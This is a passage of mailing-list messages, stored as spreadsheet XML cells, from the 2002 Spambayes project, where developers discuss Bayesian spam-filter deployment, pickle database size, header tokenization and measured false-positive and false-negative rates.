false positives.MUA corpus would then be personally trained -- although I'd like the 
option of 'down-loadable' corpuses and merge functionality.HarriPS.  Just joined the list, so pardon if my thoughts have been hashed 
through before.
</t>
  </si>
  <si>
    <t>[Guido]
&gt; ...
&gt; - A program that acts both as a pop client and a pop server.  You
&gt;   configure it by telling it about your real pop servers.  You then
&gt;   point your mail reader to the pop server at localhost.  When it
&gt;   receives a connection, it connects to the remote pop servers, reads
&gt;   your mail, and gives you only the non-spam.FYI, I'll never trust such a scheme:  I have no tolerance for false
positives, and indeed do nothing to try to block spam on any of my email
accounts now for that reason.  Deliver all suspected spam to a Spam folder
instead and I'd love it.</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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it.Another config parameter.The filter could add a header file.  Or a ~ to the subject if you like
that style. :-)--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t>[Guido]
&gt;   ...
&gt;   I don't know how big that pickle would be, maybe loading it each time
&gt;   is fine.  Or maybe marshalling.)My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t>
  </si>
  <si>
    <t>[Guido]
&gt; Takers?  How is ESR's bogofilter packaged?  SpamAssassin?  The Perl
&gt; Bayes filter advertised on slashdot?WRT the last, it's a small pile of Windows .exe files along with
cygwin1.dll.  The .exes are cmdline programs.  One is a POP3 proxy.  If I
currently have an email server named, say, mail.comcast.net, with user name
timmy, then I change my email reader to say that my server is 127.0.0.1, and
that my user name on that server is mail.comcast.net:timmy.  In that way the
proxy picks up both the real server and user names from what the mail reader
tells it the user name is.This is an N-way classifier (like ifile that way), and "all it does" is
insert a    X-Text-Classification:  one_of_the_class_names_you_pickedheader into your email before passing it on to your mail reader.  The user
then presumably fiddles their mail reader to look for such headers and "do
something about it" (and even Outlook can handle *that* much ).The user is responsible for generating text files with appropriate examples
of each class of message, and for running the cmdline tools to train the
classifier.</t>
  </si>
  <si>
    <t>You missed the part that said that spam is kept in the "eThunk" and was
viewable by a simple viewer for final disposition?Of course, with Outbloat, you could fire up PythonWin and stuff the spam
into the Junk Email folder... but then you loose the ability to retrain on
the user classified ham/spam.David LeBlanc
Seattle, WA USA&gt; -----Original Message-----
&gt; From: spambayes-bounces+whisper=oz.net@python.org
&gt; [mailto:spambayes-bounces+whisper=oz.net@python.org]On Behalf Of Tim
&gt; Peters
&gt; Sent: Friday, September 06, 2002 12:24
&gt; To: spambayes@python.org
&gt; Subject: RE: [Spambayes] Deployment
&gt;
&gt;
&gt; [Guido]
&gt; &gt; ...
&gt;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&gt;
&gt;
&gt; _______________________________________________
&gt; Spambayes mailing list
&gt; Spambayes@python.org
&gt; http://mail.python.org/mailman-21/listinfo/spambayes</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Tim Peters  is all like:&gt; [Guido]
&gt; &gt;   ...
&gt; &gt;   I don't know how big that pickle would be, maybe loading it each time
&gt; &gt;   is fine.  Or maybe marshalling.)
&gt; 
&gt; My tests train on about 7,000 msgs, and a binary pickle of the database is
&gt; approaching 10 million bytes.My paltry 3000-message training set makes a 6.3MB (where 1MB=1e6 bytes)
pickle.  hammie.py, which I just checked in, will optionally let you
write stuff out to a dbm file.  With that same message base, the dbm
file weighs in at a hefty 21.4MB.  It also takes longer to write:  Using a database:
   real    8m24.741s
   user    6m19.410s
   sys     1m33.650s  Using a pickle:
   real    1m39.824s
   user    1m36.400s
   sys     0m2.160sThis is on a PIII at 551.257MHz (I don't know what it's *supposed* to
be, 551.257 is what /proc/cpuinfo says).For comparison, SpamOracle (currently the gold standard in my mind, at
least for speed) on the same data blazes along:   real    0m29.592s
   user    0m28.050s
   sys     0m1.180sIts data file, which appears to be a marshalled hash, is 448KB.
However, it's compiled O'Caml and it uses a much simpler tokenizing
algorithm written with a lexical analyzer (ocamllex), so we'll never be
able to outperform it.  It's something to keep in mind, though.I don't have statistics yet for scanning unknown messages.  (Actually, I
do, and the database blows the pickle out of the water, but it scores
every word with 0.00, so I'm not sure that's a fair test. ;)  In any
case, 21MB per user is probably too large, and 10MB is questionable.  On the other hand, my pickle compressed very well with gzip, shrinking
down to 1.8MB.Neale
</t>
  </si>
  <si>
    <t>[Tim]
&gt; My tests train on about 7,000 msgs, and a binary pickle of the database is
&gt; approaching 10 million bytes.That shrinks to under 2 million bytes, though, if I delete all the WordInfo
records with spamprob exactly equal to UNKNOWN_SPAMPROB.  Such records
aren't needed when scoring (an unknown word gets a made-up probability of
UNKNOWN_SPAMPROB).  Such records are only needed for training; I've noted
before that a scoring-only database can be leaner.In part the bloat is due to character 5-gram'ing, part due to that the
database is brand new so has never been cleaned via clearjunk(), and part
due to plain evil gremlins.</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Tim Peters  is all like:&gt; [Tim]
&gt; &gt; My tests train on about 7,000 msgs, and a binary pickle of the database is
&gt; &gt; approaching 10 million bytes.
&gt; 
&gt; That shrinks to under 2 million bytes, though, if I delete all the WordInfo
&gt; records with spamprob exactly equal to UNKNOWN_SPAMPROB.  Such records
&gt; aren't needed when scoring (an unknown word gets a made-up probability of
&gt; UNKNOWN_SPAMPROB).  Such records are only needed for training; I've noted
&gt; before that a scoring-only database can be leaner.That's pretty good.  I wonder how much better you could do by using some
custom pickler.  I just checked my little dbm file and found a lot of
what I would call bloat:  &gt;&gt;&gt; import anydbm, hammie
  &gt;&gt;&gt; d = hammie.PersistentGrahamBayes("ham.db")
  &gt;&gt;&gt; db = anydbm.open("ham.db")
  &gt;&gt;&gt; db["neale"], len(db["neale"])
  ('ccopy_reg\n_reconstructor\nq\x01(cclassifier\nWordInfo\nq\x02c__builtin__\nobject\nq\x03NtRq\x04(GA\xce\xbc{\xfd\x94\xbboK\x00K\x00K\x00G?\xe0\x00\x00\x00\x00\x00\x00tb.', 106)
  &gt;&gt;&gt; d.wordinfo["neale"], len(`d.wordinfo["neale"]`)
  (WordInfo'(1031337979.16197, 0, 0, 0, 0.5)', 42)Ignoring the fact that there are too many zeros in there, the pickled
version of that WordInfo object is over twice as large as the string
representation.  So we could get a 50% decrease in size just by using
the string representation instead of the pickle, right?Something about that logic seems wrong to me, but I can't see what it
is.  Maybe pickling is good for heterogeneous data types, but every
value of our big dictionary is going to have the same type, so there's a
ton of redundancy.  I guess that explains why it compressed so well.Neale
</t>
  </si>
  <si>
    <t xml:space="preserve">
    &gt;&gt; &gt; ##Remove: jeremy@alum.mit.edu##    Tim&gt; Yuck: it got two 0.01's from embedding your email address at the
    Tim&gt; bottom here.Which suggests that tagging email addresses in To/CC headers should be
handled differently than in message bodies?Skip</t>
  </si>
  <si>
    <t>&gt;     &gt;&gt; &gt; ##Remove: jeremy@alum.mit.edu##
&gt;
&gt;     Tim&gt; Yuck: it got two 0.01's from embedding your email address at the
&gt;     Tim&gt; bottom here.
&gt;
&gt; Which suggests that tagging email addresses in To/CC headers should be
&gt; handled differently than in message bodies?I don't know whether it suggests that, but they would be tagged differently
in to/cc if I were tagging them at all right now.  If I were tagging To:
addresses, for example, the tokens would look like    'to:email addr:mit'instead of    'email addr:mit'as they appear when an email-like thingie is found in the body.  Whether
email addresses should be stuck in as one blob or split up as they are now
is something I haven't tested.</t>
  </si>
  <si>
    <t xml:space="preserve">    http://sf.net/project/showfiles.php?group_id=61702    This is the binary pickle of my classifier after training on
    my first spam/ham corpora pair.  All records with
    spamprob == UNKNOWN_SPAMPROB have been purged.It's in a zip file, and is only half a meg.Jeremy, it would be interesting if you tried that on your data.  The false
negative rates across my other 4 test sets when run against this are:      0.364%
      0.400%
      0.400%
      0.909%</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "TP" == Tim Peters  writes:  &gt;&gt; The false positive rate is 0-3%.  (Finally!  I had to scrub a
  &gt;&gt; bunch of previously unnoticed spam from my inbox.)  Both
  &gt;&gt; collections have about 1100 messages.  TP&gt; Does this mean you trained on about 1100 of each?The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headers.I tried the "Anthony" stuff, but it didn't make any appreciable
difference that I could see from staring at the false negative rate.
The numbers are big enough that a quick eyeball suffices.Then I tried a dirt simple tokenizer for the headers that tokenize the
words in the header and emitted like this "%s: %s" % (hdr, word).
That worked too well :-).  The received and date headers helped the
classifier discover that most of my spam is old and most of my ham is
new.So I tried a slightly more complex one that skipped received, data,
and x-from_, which all contained timestamps.  I also skipped the X-VM-
headers that my mail reader added:class MyTokenizer(Tokenizer):    skip = {'received': 1,
            'date': 1,
            'x-from_': 1,
            }    def tokenize_headers(self, msg):
        for k, v in msg.items():
            k = k.lower()
            if k in self.skip or k.startswith('x-vm'):
                continue
            for w in subject_word_re.findall(v):
                for t in tokenize_word(w):
                    yield "%s:%s" % (k, t)This did moderately better.  The false negative rate is 7-21% over the
tests performed so far.  This is versus 11-28% for the previous test
run that used the timtest header tokenizer.It's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:-).One final note.  It looks like many of the false positives are from
people I've never met with questions about Shakespeare.  They often
start with stuff like:&gt; Dear Sir/Madam,
&gt; 
&gt; May I please take some of your precious time to ask you to help me to find a
&gt; solution to a problem that is worrying me greatly. I am old science studentI guess that reads a lot like spam :-(.Jeremy
238 hams &amp; 221 spams
    false positive: 2.10084033613
    false negative: 9.50226244344
    new false positives: []
    new false negatives: []    best discriminators:
        'x-mailscanner:clean' 671 0.0483425
        'x-spam-status:IN_REP_TO' 679 0.01
        'delivered-to:skip:s 10' 691 0.0829876
        'x-mailer:Lucid' 699 0.01
        'x-mailer:XEmacs' 699 0.01
        'x-mailer:patch' 699 0.01
        'x-mailer:under' 709 0.01
        'x-mailscanner:Found' 716 0.0479124
        'cc:zope.com' 718 0.01
        "i'll" 750 0.01
        'references:skip:1 20' 767 0.01
        'rossum' 795 0.01
        'x-spam-status:skip:S 10' 825 0.01
        'van' 850 0.01
        'http0:zope' 869 0.01
        'email addr:zope' 883 0.01
        'from:python.org' 895 0.01
        'to:jeremy' 902 0.185401
        'zope' 984 0.01
        'list-archive:skip:m 10' 1058 0.01
        'list-subscribe:skip:m 10' 1058 0.01
        'list-unsubscribe:skip:m 10' 1058 0.01
        'from:zope.com' 1098 0.01
        'return-path:zope.com' 1115 0.01
        'wrote:' 1129 0.01
        'jeremy' 1150 0.01
        'email addr:python' 1257 0.01
        'x-mailman-version:2.0.13' 1311 0.01
        'x-mailman-version:101270' 1395 0.01
        'python' 1401 0.01</t>
  </si>
  <si>
    <t>[Neale Pickett]
&gt; I hacked up something to turn WordInfo into a tuple before pickling,That's what WordInfo.__getstate__ does.&gt; and then turn the tuple back into WordInfo right after unpickling.Likewise for WordInfo.__setstate__.&gt; Without this hack, my database was 21549056 bytes.  After, it's 9945088
bytes.
&gt; That's a 50% savings, not a bad optimization.I'm not sure what you're doing, but suspect you're storing individual
WordInfo pickles.  If so, most of the administrative pickle bloat is due to
that, and doesn't happen if you pickle an entire classifier instance
directly.&gt; So my question is, would it be too painful to ditch WordInfo in favor of
&gt; a straight out tuple?  (Or list if you'd rather, although making it a
&gt; tuple has the nice side-effect of forcing you to play nice with my
&gt; DBDict class).
&gt;
&gt; I hope doing this sort of optimization isn't too far distant from the
&gt; goal of this project, even though README.txt says it is :)
&gt;
&gt; Diff attached.  I'm not comfortable checking this in,I think it's healthy that you're uncomfortable checking things in with&gt; +            # XXX: kludge kludge kludge.comments .&gt; since I don't really like how it works (I'd rather just get rid of
WordInfo).
&gt; But I guess it proves the point :)I'm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e.g., Jeremy's writeup of his disappointing first-time experiences
today).  Let's keep it as easy as possible to modify for now.  If you're
desparate to save memory, write a subclass?Other people are free to vote in other directions, of course .</t>
  </si>
  <si>
    <t>[Barry]
&gt; Here's an interesting thing to test: discriminate words differently if
&gt; they are on a line that starts with `&gt;' or, to catch styles like
&gt; above, that the first occurance on a line of &lt; or &gt; is &gt; (to eliminate
&gt; html).Give me a mod to timtoken.py that does this, and I'll be happy to test it.&gt; Then again, it may not be worth trying to un-false-positive that
&gt; Nigerian scam quote.If there's any sanity in the world, even the original poster would be glad
to have his kneejerk response blocked .  OTOH, you know there are a
great many msgs on c.l.py (all over Usenet) that do nothing except quote a
previous post and add a one-line comment.  Remove the quoted sections from
those, and there may be no content left to judge except for the headers.  So
I can see this nudging the stats in either direction.  The only way to find
out for sure is for you to write some code .</t>
  </si>
  <si>
    <t>[Jeremy Hylton[
&gt; The total collections are 1100 messages.  I trained with 1100/5
&gt; messages.I'm reading this now as that you trained on about 220 spam and about 220
ham.  That's less than 10% of the sizes of the training sets I've been
using.  Please try an experiment:  train on 550 of each, and test once
against the other 550 of each.  Do that a few times making a random split
each time (it won't be long until you discover why directories of individual
files are a lot easier to work -- e.g., random.shuffle() makes this kind of
thing trivial for me).</t>
  </si>
  <si>
    <t>[Jeremy]
&gt; The total collections are 1100 messages.  I trained with 1100/5
&gt; messages.While that's not a lot of training data, I picked random subsets of my
corpora and got much better behavior (this is rates.py output; f-p rate per
run in left column, f-n rate in right):Training on Data/Ham/Set1 &amp; Data/Spam/Set1 ... 220 hams &amp; 220 spams
      0.000   1.364
      0.000   0.455
      0.000   1.818
      0.000   1.364
Training on Data/Ham/Set2 &amp; Data/Spam/Set2 ... 220 hams &amp; 220 spams
      0.455   2.727
      0.455   0.455
      0.000   0.909
      0.455   2.273
Training on Data/Ham/Set3 &amp; Data/Spam/Set3 ... 220 hams &amp; 220 spams
      0.000   2.727
      0.455   0.909
      0.000   0.909
      0.000   1.818
Training on Data/Ham/Set4 &amp; Data/Spam/Set4 ... 220 hams &amp; 220 spams
      0.000   2.727
      0.000   0.909
      0.000   0.909
      0.000   1.818
Training on Data/Ham/Set5 &amp; Data/Spam/Set5 ... 220 hams &amp; 220 spams
      0.000   1.818
      0.000   1.364
      0.000   0.909
      0.000   2.273
total false pos 4 0.363636363636
total false neg 29 2.63636363636Another full run with another randomly chosen (but disjoint) 220 of each in
each set was much the same.  The score distribution is also quite sharp:Ham distribution for all runs:
* = 74 items
  0.00 4381 ************************************************************
  2.50    3 *
  5.00    3 *
  7.50    1 *
 10.00    0
 12.50    0
 15.00    1 *
 17.50    1 *
 20.00    1 *
 22.50    0
 25.00    0
 27.50    0
 30.00    1 *
 32.50    0
 35.00    0
 37.50    0
 40.00    1 *
 42.50    0
 45.00    0
 47.50    0
 50.00    0
 52.50    0
 55.00    0
 57.50    1 *
 60.00    0
 62.50    0
 65.00    0
 67.50    1 *
 70.00    0
 72.50    0
 75.00    0
 77.50    0
 80.00    0
 82.50    0
 85.00    0
 87.50    1 *
 90.00    0
 92.50    2 *
 95.00    0
 97.50    2 *Spam distribution for all runs:
* = 73 items
  0.00   13 *
  2.50    0
  5.00    4 *
  7.50    5 *
 10.00    0
 12.50    2 *
 15.00    1 *
 17.50    1 *
 20.00    2 *
 22.50    1 *
 25.00    0
 27.50    1 *
 30.00    0
 32.50    3 *
 35.00    0
 37.50    0
 40.00    0
 42.50    0
 45.00    1 *
 47.50    3 *
 50.00   16 *
 52.50    0
 55.00    0
 57.50    0
 60.00    1 *
 62.50    0
 65.00    2 *
 67.50    1 *
 70.00    1 *
 72.50    0
 75.00    1 *
 77.50    0
 80.00    3 *
 82.50    2 *
 85.00    1 *
 87.50    2 *
 90.00    2 *
 92.50    4 *
 95.00    4 *
 97.50 4323 ************************************************************It's hard to say whether you need better ham or better spam, but I suspect
better spam .  18 of the 30 most powerful discriminators here were
HTML-related spam indicators; the top 10 overall were:        '' 312 0.99
        '' 329 0.99
        'click' 334 0.99
        '' 335 0.99
        'wrote:' 381 0.01
        'skip:&lt; 10' 398 0.99
        'python' 428 0.01
        'content-type:text/html' 454 0.99The HTML tags come from non-multipart/alternative HTML messages, from which
HTML tags aren't stripped, and there are lots of these in my spam sets.That doesn't account for it, though.  If I strip HTML tags out of those too,
the rates are only a little worse:raining on Data/Ham/Set1 &amp; Data/Spam/Set1 ... 220 hams &amp; 220 spams
     0.000   1.364
     0.000   1.818
     0.455   1.818
     0.000   1.818
raining on Data/Ham/Set2 &amp; Data/Spam/Set2 ... 220 hams &amp; 220 spams
     0.000   1.364
     0.455   1.818
     0.455   0.909
     0.000   1.818
raining on Data/Ham/Set3 &amp; Data/Spam/Set3 ... 220 hams &amp; 220 spams
     0.000   2.727
     0.000   0.909
     0.909   0.909
     0.455   1.818
raining on Data/Ham/Set4 &amp; Data/Spam/Set4 ... 220 hams &amp; 220 spams
     0.000   1.818
     0.000   0.909
     0.455   0.909
     0.000   1.364
raining on Data/Ham/Set5 &amp; Data/Spam/Set5 ... 220 hams &amp; 220 spams
     0.000   2.727
     0.000   1.364
     0.455   2.273
     0.455   2.273
otal false pos 4 0.363636363636
otal false neg 34 3.09090909091The 4th-strongest discriminator *still* finds another HTML clue, though!        'subject:Python' 164 0.01
        'money' 169 0.99
        'content-type:text/plain' 185 0.2
        'charset:us-ascii' 191 0.127273
        "i'm" 232 0.01
        'content-type:text/html' 248 0.983607
        'Â ' 255 0.99
        'wrote:' 372 0.01
        'python' 431 0.01
        'click' 519 0.99Heh.  I forgot all about Â .</t>
  </si>
  <si>
    <t xml:space="preserve">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package.I found it made no difference for my testing.&gt; The brilliance of Anthony's "just count them" scheme is that it requires no
&gt; thought, so can't be fooled .  Header lines that are evenly
&gt; distributed across spam and ham will turn out to be worthless indicators
&gt; (prob near 0.5), so do no harm.zactly. I started off doing clever clever things, and, as always with
this stuff, found that stupid with a rock beats smart with scissors,
every time.
-- 
Anthony Baxter        
It's never too late to have a happy childhood.</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; Looks like your ham corpus by and large has To: jeremy@alum.mit.edu in
&gt; a header while your spam corpus by and large doesn't.  But this one
&gt; does.Interestingly, for me, one of the highest value spam indicators was
the name of the mail host that the spam was delivered to, in the To:
line. So mail to info@gin.elax2.ekorp.com was pretty much a dead cert
for the filters.
-- 
Anthony Baxter        
It's never too late to have a happy childhood.</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt; Jeremy Hylton wrote
&gt; Then I tried a dirt simple tokenizer for the headers that tokenize the
&gt; words in the header and emitted like this "%s: %s" % (hdr, word).
&gt; That worked too well :-).  The received and date headers helped the
&gt; classifier discover that most of my spam is old and most of my ham is
&gt; new.Heh. I hit the same problem, but the other way round, when I first
started playing with this - I'd collected spam for a week or two, 
then mixed it up with randomly selected messages from my mail boxes.course, it instantly picked up on 'received:2001' as a non-ham. Curse that too-smart-for-me software. Still, it's probably a good
thing to note in the documentation about the software - when collecting
spam/ham, make _sure_ you try and collect from the same source.
Anthony-- 
Anthony Baxter        
It's never too late to have a happy childhood.</t>
  </si>
  <si>
    <t>&gt; course, it instantly picked up on 'received:2001' as a non-ham. 
                                                            -spam.*sigh*
-- 
Anthony Baxter        
It's never too late to have a happy childhood.</t>
  </si>
  <si>
    <t xml:space="preserve">There seem to be two "drivers" for the classifier now: Neale Pickett's
hammie.py, and the original GBayes.py.  According to the README.txt,
GBayes.py hasn't been kept up to date.  Is there anything in there
that isn't covered by hammie.py?  About the only useful feature of
GBayes.py that hammie.py doesn't (yet) copy is -u, which calculates
spamness for an entire mailbox.  This feature can easily be copied
into hammie.py.  (GBayes.py also has a large collection of tokenizers;
but timtoken.py rules, so I'm not sure how interesting that is now.)Therefore I propose to nuke GBayes.py, after adding a -u feature.Anyone against?  (I imagine that Skip or Barry might have a stake in
GBayes.py; Tim seems to have moved all code he's working to other
modules.)--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">
I actually like Neale's X-Spam-Disposition header, I just wonder if maybe we
should choose something with a different prefix than "X-Spam-" so that
people don't confuse it with SpamAssassin, all of whose headers begin with
that prefix.Also, some sort of version information would be useful.  Perhaps the CVS
version number for the classifier module could be tacked on.Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt; Skip Montanaro wrote
&gt; 
&gt; I actually like Neale's X-Spam-Disposition header, I just wonder if maybe we
&gt; should choose something with a different prefix than "X-Spam-" so that
&gt; people don't confuse it with SpamAssassin, all of whose headers begin with
&gt; that prefix.I think it's fine, in general, just so long as no-one checks in anything
that puts it into my test corpus.Or alternately, whatever is chosen should be ignored by the tokenizer. 
I know my mail host (interlink) runs SA, but I also run it, with my own
set of rules and scores. I don't want my spam-filter to be getting messed
up by an upstream spam filter.
</t>
  </si>
  <si>
    <t xml:space="preserve">
    Guido&gt; Therefore I propose to nuke GBayes.py, after adding a -u feature.    Guido&gt; Anyone against?  (I imagine that Skip or Barry might have a stake
    Guido&gt; in GBayes.py; Tim seems to have moved all code he's working to
    Guido&gt; other modules.)No argument here.Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">
If the frequency of my laptop's disk chirps are any indication, I'd say
hammie is about 3-5x faster than SpamAssassin.Skip</t>
  </si>
  <si>
    <t xml:space="preserve">I'm listed as a developer on SF and have the spambayes CVS module checked
out using my SF username, but I'm unable to write to the repository.  CVS
complains:    % cvs add unheader.py
    cvs [server aborted]: "add" requires write access to the repositoryAny thoughts?Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Tim Peters  is all like:&gt; I'm not sure what you're doing, but suspect you're storing individual
&gt; WordInfo pickles.  If so, most of the administrative pickle bloat is
&gt; due to that, and doesn't happen if you pickle an entire classifier
&gt; instance directly.Yeah, that's exactly what I was doing--I didn't realize I was incurring
administrative pickle bloat this way.  I'm specifically trying to make
things faster and smaller, so I'm storing individual WordInfo pickles
into an anydbm dict (keyed by token).  The result is that it's almost 50
times faster to score messages one per run our of procmail (.408s vs
18.851s).However, it *does* say all over the place that the goal of this project
isn't to make the fastest or the smallest implementation, so I guess
I'll hold off doing any further performance tuning until the goal starts
to point more in that direction.  .4 seconds is probably fast enough for
people to use it in their procmailrc, which is what I was after.&gt; If you're desparate to save memory, write a subclass?That's probably what I'll do if I get too antsy :)Trying to think of ways to sneak "administrative pickle boat" into
casual conversation,Neale
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;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18.851s).This is very worthwhile.&gt;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after.Maybe.  I batch messages using fetchmail (don't ask why), and adding
.4 seconds per message for a batch of 50 (not untypical) feels like a
real wait to me...--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t>[Skip Montanaro]
&gt; I'm listed as a developer on SF and have the spambayes CVS module checked
&gt; out using my SF username, but I'm unable to write to the repository.  CVS
&gt; complains:
&gt;
&gt;     % cvs add unheader.py
&gt;     cvs [server aborted]: "add" requires write access to the repository
&gt;
&gt; Any thoughts?Not really.  Try again?  About half the developers on the spambayes project
were missing some permission or other, so I ran thru all of them and checked
every damned box and clicked on every damn dropdown list I could find.  As
far as SF is concerned, you're all sitting on God's Right Hand now, so if it
still doesn't work I suggest you upgrade to Win98 .</t>
  </si>
  <si>
    <t xml:space="preserve">
    Tim&gt; About half the developers on the spambayes project were missing
    Tim&gt; some permission or other, so I ran thru all of them and checked
    Tim&gt; every damned box and clicked on every damn dropdown list I could
    Tim&gt; find.  As far as SF is concerned, you're all sitting on God's Right
    Tim&gt; Hand now, so if it still doesn't work I suggest you upgrade to
    Tim&gt; Win98 .Time to upgrade I guess. :-(    % cvs add unheader.py 
    cvs [server aborted]: "add" requires write access to the repositoryI'll try a checkout into a new directory...S
</t>
  </si>
  <si>
    <t>[Skip Montanaro, to Anthony Baxter]
&gt; ...
&gt; Accordingly, I wrote unheader.py, which is mostly a ripoff of something
&gt; someone else posted to python-dev or c.l.py within the last week or so to
&gt; strip out SA-generated headers.Unless I've grown senile tonight, you got it from Anthony to begin with.
Please check it in to project, and add a short blurb to README.txt!</t>
  </si>
  <si>
    <t xml:space="preserve">
    &gt;&gt; ... choose something with a different prefix than "X-Spam-" so that
    &gt;&gt; people don't confuse it with SpamAssassin ...    Neale&gt; How about X-Spambayes-Disposition (or X-Hammie-Disposition if
    Neale&gt; there'll be other classifier front-ends)?I kinda like "hammie".  Your front end was there first, so I suspect it will
rule the front end roost.S</t>
  </si>
  <si>
    <t xml:space="preserve">
    Skip&gt; I'll try a checkout into a new directory...Which didn't help.  At the very least I think that means it's time for
bed...Skip</t>
  </si>
  <si>
    <t xml:space="preserve">
    &gt;&gt; Accordingly, I wrote unheader.py, which is mostly a ripoff of
    &gt;&gt; something someone else posted to python-dev or c.l.py within the last
    &gt;&gt; week or so to strip out SA-generated headers.    Tim&gt; Unless I've grown senile tonight, you got it from Anthony to begin
    Tim&gt; with.  Please check it in to project, and add a short blurb to
    Tim&gt; README.txt!Raring to go, once I can write to CVS...S
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Guido van Rossum  is all like:&gt; Maybe.  I batch messages using fetchmail (don't ask why), and adding
&gt; .4 seconds per message for a batch of 50 (not untypical) feels like a
&gt; real wait to me...Yeesh.  Sounds like what you need is something to kick up once and score
an entire mailbox.Wait a second...  So *that's* why you wanted -u.If you can spare the memory, you might get better performance in this
case using the pickle store, since it only has to go to disk once (but
boy, does it ever go to disk!)  I can't think of anything obvious to
speed things up once it's all loaded into memory, though.  That's
profiler territory, and profiling is exactly the kind of optimization
I just said I wasn't going to do :)Neale
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; Maybe.  I batch messages using fetchmail (don't ask why), and adding
&gt; &gt; .4 seconds per message for a batch of 50 (not untypical) feels like a
&gt; &gt; real wait to me...
&gt; 
&gt; Yeesh.  Sounds like what you need is something to kick up once and score
&gt; an entire mailbox.
&gt; 
&gt; Wait a second...  So *that's* why you wanted -u.
&gt; 
&gt; If you can spare the memory, you might get better performance in this
&gt; case using the pickle store, since it only has to go to disk once (but
&gt; boy, does it ever go to disk!)  I can't think of anything obvious to
&gt; speed things up once it's all loaded into memory, though.  That's
&gt; profiler territory, and profiling is exactly the kind of optimization
&gt; I just said I wasn't going to do :)We could have a server mode (someone described this as an SA option).--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "TP" == Tim Peters  writes:  TP&gt; [Jeremy Hylton[
  &gt;&gt; The total collections are 1100 messages.  I trained with 1100/5
  &gt;&gt; messages.  TP&gt; I'm reading this now as that you trained on about 220 spam and
  TP&gt; about 220 ham.  That's less than 10% of the sizes of the
  TP&gt; training sets I've been using.  Please try an experiment: train
  TP&gt; on 550 of each, and test once against the other 550 of each.This helps a lot!  Here are results with the stock tokenizer:Training on  &amp; 
 ... 644 hams &amp; 557 spams
      0.000  10.413
      1.398   6.104
      1.398   5.027
Training on  &amp; 
 ... 644 hams &amp; 557 spams
      0.000   8.259
      1.242   2.873
      1.242   5.745
Training on  &amp; 
 ... 644 hams &amp; 557 spams
      1.398   5.206
      1.398   4.488
      0.000   9.336
Training on  &amp; 
 ... 644 hams &amp; 557 spams
      1.553   5.206
      1.553   5.027
      0.000   9.874
total false pos 139 5.39596273292
total false neg 970 43.5368043088And results from the tokenizer that looks at all headers except Date,
Received, and X-From_:Training on  &amp; 
 ... 644 hams &amp; 557 spams
      0.000   7.540
      0.932   4.847
      0.932   3.232
Training on  &amp; 
 ... 644 hams &amp; 557 spams
      0.000   7.181
      0.621   2.873
      0.621   4.847
Training on  &amp; 
 ... 644 hams &amp; 557 spams
      1.087   4.129
      1.087   3.052
      0.000   6.822
Training on  &amp; 
 ... 644 hams &amp; 557 spams
      0.776   3.411
      0.776   3.411
      0.000   6.463
total false pos 97 3.76552795031
total false neg 738 33.1238779174Is it safe to conclude that avoiding any cleverness with headers is a
good thing?  TP&gt; Do that a few times making a random split each time (it won't be
  TP&gt; long until you discover why directories of individual files are
  TP&gt; a lot easier to work -- e.g., random.shuffle() makes this kind
  TP&gt; of thing trivial for me).You haven't looked at mboxtest.py, have you?  I'm using
random.shuffle(), too.  You don't need to have many files to make an
arbitrary selection of messages from an mbox.I'll report some more results when they're done.Jeremy
</t>
  </si>
  <si>
    <t>&gt;   TP&gt; I'm reading this now as that you trained on about 220 spam and
&gt;   TP&gt; about 220 ham.  That's less than 10% of the sizes of the
&gt;   TP&gt; training sets I've been using.  Please try an experiment: train
&gt;   TP&gt; on 550 of each, and test once against the other 550 of each.[Jeremy]
&gt; This helps a lot!Possibly.  I checked in a change to classifier.py overnight (getting rid of
MINCOUNT) that gave a major improvement in the f-n rate too, independent of
tokenization.&gt; Here are results with the stock tokenizer:Unsure what "stock tokenizer" means to you.  For example, it might mean
tokenizer.tokenize, or mboxtest.MyTokenizer.tokenize.&gt; Training on  &amp;  /home/jeremy/Mail/spam 8&gt;
&gt;  ... 644 hams &amp; 557 spams
&gt;       0.000  10.413
&gt;       1.398   6.104
&gt;       1.398   5.027
&gt; Training on  &amp;  /home/jeremy/Mail/spam 0&gt;
&gt;  ... 644 hams &amp; 557 spams
&gt;       0.000   8.259
&gt;       1.242   2.873
&gt;       1.242   5.745
&gt; Training on  &amp;  /home/jeremy/Mail/spam 3&gt;
&gt;  ... 644 hams &amp; 557 spams
&gt;       1.398   5.206
&gt;       1.398   4.488
&gt;       0.000   9.336
&gt; Training on  &amp;  /home/jeremy/Mail/spam 0&gt;
&gt;  ... 644 hams &amp; 557 spams
&gt;       1.553   5.206
&gt;       1.553   5.027
&gt;       0.000   9.874
&gt; total false pos 139 5.39596273292
&gt; total false neg 970 43.5368043088Note that those rates remain much higher than I got using just 220 of ham
and 220 of spam.  That remains A Mystery.&gt; And results from the tokenizer that looks at all headers except Date,
&gt; Received, and X-From_:Unsure what that means too.  For example, "looks at" might mean you enabled
Anthony's count-them gimmick, and/or that you're tokenizing them yourself,
and/or ...?&gt; Training on  &amp;  /home/jeremy/Mail/spam 8&gt;
&gt;  ... 644 hams &amp; 557 spams
&gt;       0.000   7.540
&gt;       0.932   4.847
&gt;       0.932   3.232
&gt; Training on  &amp;  /home/jeremy/Mail/spam 0&gt;
&gt;  ... 644 hams &amp; 557 spams
&gt;       0.000   7.181
&gt;       0.621   2.873
&gt;       0.621   4.847
&gt; Training on  &amp;  /home/jeremy/Mail/spam 3&gt;
&gt;  ... 644 hams &amp; 557 spams
&gt;       1.087   4.129
